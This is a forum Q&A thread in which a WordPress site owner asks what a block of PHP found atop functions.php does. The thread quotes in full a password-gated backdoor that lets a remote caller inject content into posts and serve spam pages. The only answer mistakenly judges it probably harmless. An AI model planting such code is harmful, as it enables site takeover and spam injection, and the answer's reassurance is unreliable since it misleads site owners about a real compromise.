# Found Malicious coding in my WordPress website?

Tags: php, wordpress

I think I have found malicious coding, but I am not sure. It's not encoded or anything, it's just sitting on the top of `functions.php`. I'm having a hard time finding out what its doing once someone triggers the `REQUEST`. What is this code doing and is it harmful?

```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'c12fe9ee24891bcd8208f0b9f308c603'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.esc_sql($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . esc_sql($post_content) . '" WHERE `ID` = "' . esc_sql($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.esc_sql($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.esc_sql($_REQUEST['url']).'", `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql($_REQUEST['content']).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql(urldecode($_REQUEST['content'])).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>
```

Comment: You may want to read over this thread - https://wordpress.org/support/topic/code-added-to-functions-file/ - long story short, a developer installed a plugin called wootabs.zip and started finding that exact block of code at the top of his/her functions.php. He/she also noticed two new files in wp_includes. There is a bunch of speculation in the thread, including a link to a pastebin about a 'virus' that can be found on dlwordpress.com. Good job finding this - that kind of vigilance deserves praise.

Comment: @0708 Holy, that's scary. I can't find any files you mentioned, but I haven't ran the coding yet. Will be removing this coding and cleaning my core files, just to be sure. Thanks for linking me.

Answer (score 1):

The  code just looks like it's printing the output to the screen, can't see it sending data to remote site or service. So I doubt it's malicious.

I would recommend installing the wordfence plugin and scanning your site for malicious code.

Comment: What theme are you running, the password is a superglobal so it may be required. I.e to perform the action user must be able to perform that action.

Comment: It's "The Retailer", a paid theme

Comment: Ok just run a wordfence scan, in the options check the boxes to scan plugins and themes against repository

Comment: Tried to install Wordfence but the website goes blanco. Will be installing a different security plugin I'd be sure to post the result.

Comment: Oh wow that's strange, it shouldn't do that. Especially with a paid theme. Try another popular plugin, but I found wordfence the best

Comment: It was some kind of issue with my xampp. Resolved it and scanned the WP installation, no issues found. I've removed the supposed malicious coding from the functions.php so we should be good now.